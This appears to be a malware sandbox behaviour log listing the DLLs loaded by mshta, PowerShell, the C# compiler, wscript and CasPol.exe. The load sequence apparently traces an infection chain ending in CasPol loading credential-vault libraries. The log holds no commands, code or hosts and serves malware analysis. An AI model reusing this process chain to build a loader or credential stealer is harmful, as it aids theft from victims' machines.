                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wintypes.dll
